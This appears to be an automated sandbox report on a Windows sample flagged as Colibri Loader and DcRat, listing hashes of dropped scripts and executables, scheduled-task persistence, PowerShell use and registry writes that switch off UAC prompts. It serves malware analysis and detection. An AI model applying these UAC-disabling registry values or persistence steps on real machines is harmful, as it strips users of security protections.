SHA1 925b231830aa6e67f0a131ffa811190176ad7f04
SHA256 0d2340ee9dbd88a977ea21db41d5f693b0e899d69f7212338d97f336077bc4b3
SHA512 daa4d57a726cdac8bc3c0819344f10a6d3c32cd5df24e548c90389c96ae211124675cf20daa0496d2dc3ff40ee7b485451ba9aab72ee487126a8837dd3815e4b

C:\Users\Admin\AppData\Local\Temp\0EpYUV7rVf.bat

MD5 bc04c7cfbce18199287c4cd8b51f4b66
SHA1 ce4c57f57ecee1666869e3b05ab379e931aad2cf
SHA256 f42697c6f2c8272a1d680d92bdbacc3afda90b1f8bb0aac7b9d1affd45967a08
SHA512 d47f7653cff12fc9c514b0a5c69daaa7445fd9d08b9f0255b64ce2505e16911a8f2cd0f5c0d9f81b53a8a6c5df077cbec103376830f658eccaf32e13871aa9cb

memory/2616-142-0x000000001B310000-0x000000001B5F2000-memory.dmp

memory/1740-144-0x000007FEF5A60000-0x000007FEF644C000-memory.dmp

memory/2172-143-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2868-164-0x0000000000C20000-0x0000000001114000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\65d9c934-ccb1-46d4-ad81-cc05d426e2fb.vbs

MD5 06a3ce8802cd79ab448caccbb11638be
SHA1 d65c73f3f8bc9470528e42b9c269fdba118c656d
SHA256 e89b65502b9f6aa15677b221c5f5c8a1adc705422d81d8d4f1b849ab732744b0
SHA512 b65cc16fe2d06a013c348c37dd5cc887ac1225373b416ba6217e845f2e0f528dc9a97c3a62febc594aea1aa9d29a3dfc59cff01906895f5f0cc614413670106b

C:\Users\Admin\AppData\Local\Temp\d0b27f55-043d-44d8-bb49-edac62daf534.vbs

MD5 d454376207c8cbcb93d98d094d7b845f
SHA1 2222da517cca3985a0bc84e65805825e37db737a
SHA256 e0738cd7faa6b7e918092d7fe891af52977c6a3412e03e2ff0a63561f6f3234d
SHA512 32280cfb1e76459407aba988d6ed213c45595c72683fc889c2b422ac1fa2950d2ace85caef57bc2688c6df0f6adf5668d46d902996253482ad3f12993181996b

C:\Users\Admin\AppData\Local\Temp\tmpF6FC.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

C:\Users\Admin\AppData\Local\Temp\ab0385af-7c65-4dd9-9fc7-3ce605066610.vbs

MD5 e07b73e7c99e883524220f9771e1cc14
SHA1 02a74f92d5fbdd6ad5492ff12c3f532d0432b6bf
SHA256 b220b2c8382943905945b7855840b7e212055e1a861461635fbcec4d400f845e
SHA512 8a37ea23e7d2a8f1ff9c56e8a7f634960df1c041d4d291a7d6dccf0795184c1ddd7705fb3bb9c16d5432724b981dde609ad58bd78762c62d40eb6de365108b92

memory/2156-192-0x0000000000EC0000-0x00000000013B4000-memory.dmp

memory/2156-193-0x0000000000AA0000-0x0000000000AB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\37ce2d55-a30d-469a-b78d-d3f50b81ccab.vbs

MD5 d59fdc774bf3e2b7eaabf59f2e68246e
SHA1 5a4bdbcc000bdef7416383807885ffb9a573dd53
SHA256 1fd9f3495e3264cc7dcf9a95844af7c6e6a5869559fba55dacd948077e151a29
SHA512 1364fb335eae47a65b516e60b5c9f8b44d25f819ca0510ca893a3f7fe9f435ccd820f1096a9c5d51354003e0b161322309602b283aac84234ae7e57e74574806

C:\Users\Admin\AppData\Local\Temp\e0801a69-6fb7-4a78-b405-de19841e11a0.vbs

MD5 83d5a737a9119fa9ccb9b8959ad3dbeb
SHA1 37ca3d27fb03a5c95df22586d0fe2974ecbcb622
SHA256 143aafacf79e9ce2a774a031e7803ee1eed66bad78e97a5bce6d2461d752db8a
SHA512 0167ec2cf53b05510c4bffd6b1d46b5595cb1ae4726aee018fac01e313c521a1bc3808482bdcec098363ca891b3f289bff6bf3c79fd3c04c66420de16146a146

memory/2280-222-0x0000000001320000-0x0000000001814000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e88acb5f-586f-432c-9bb6-a9335c637174.vbs

MD5 6753b6e09f2df6640ef6f3a46aa4a4d8
SHA1 2478c5797462fae002e47b9d015f1c053930686c
SHA256 883e39093d8dfd5379a31510756131ea9ef27d65012aa85692e50f3d268e0d50
SHA512 fe932dc981f5d07a5979b2eb02e53ab21887e9bb7b08f0205184bb4ed0420753b21fc6507800fc66eb160b45879433e55cf5ebeb5d749426526a45d6fe74ef8b

C:\Users\Admin\AppData\Local\Temp\607d0094-c8cf-45b0-a489-eb60253042bd.vbs

MD5 bc4cb2a473cb30cd0d773e83b660f572
SHA1 0e9bfc2626390553fd29d38952257cdb74070d69
SHA256 fa1b1768cfea64ed3b25d11d415324ccd3d123227a5d6e2b4788470b723340bf
SHA512 7d648d2f9ef38be926310c2d3b34b502de0b520cb30f8e5e8ba89e678c12936f12525ea31a06636a069ff8b3f0680a96905aa5970bab4011a4503f0f7bcd751d

C:\Users\Admin\AppData\Local\Temp\eb67a883-7167-4851-8475-59ffe31fb9ca.vbs

MD5 c05e3d4254eb612e6deb933ee3127a3e
SHA1 15e402eaa729ee56d4c63e7070bb138960c74df4
SHA256 660d096e77bc40c708d1adba73a51a1131408081e9a434184285a6c61bccace8
SHA512 53090d18ad56d8fca05cde5572ef616b980fb81faf1bb5a3168a28a6099bf666a60dec6c589192f97ff7a1d43cdb44fa96574f36101bb7103153dfe2e6c399d5

C:\Users\Admin\AppData\Local\Temp\d00a8001-25b8-4121-bf98-8ef2d7936fa1.vbs

MD5 3938b8b6312fec2ad80766e03d4bfd4e
SHA1 baff044ee70a1724144f390c83b7dced2d067c30
SHA256 29308b0a1106a64c49fa116ec97619f342d1a233b45a1d1ec7e28da90c602d45
SHA512 9de18ae35d2b6c8b6a427f75ee395856aae01f18f0ae80c908104d70cc252271695a5cfc59e52eaab1d1a1f22f86dbb557dccd2051bff486e935232541963532

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 15:19

Reported

2024-11-08 15:21

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

Signatures

Colibri Loader

loader colibri

Colibri family

colibri

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files\VideoLAN\6ccacd8608530f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\66fc9ff0ee96c2 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Windows\PLA\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files\Windows Multimedia Platform\9e8d7a4ca61bd9 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Windows\Temp\MsEdgeCrashpad\reports\e1ef82546f0b02 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
File created C:\Program Files\Windows Media Player\es-ES\e15c75ee0b3582 C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Program Files\dotnet\shared\e6c9b481da804f C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Default\Pictures\SppExtComObj.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpC208.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpDFD1.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpFC32.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2D35.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp5DEA.tmp.exe N/A
N/A N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp8E8F.tmp.exe N/A
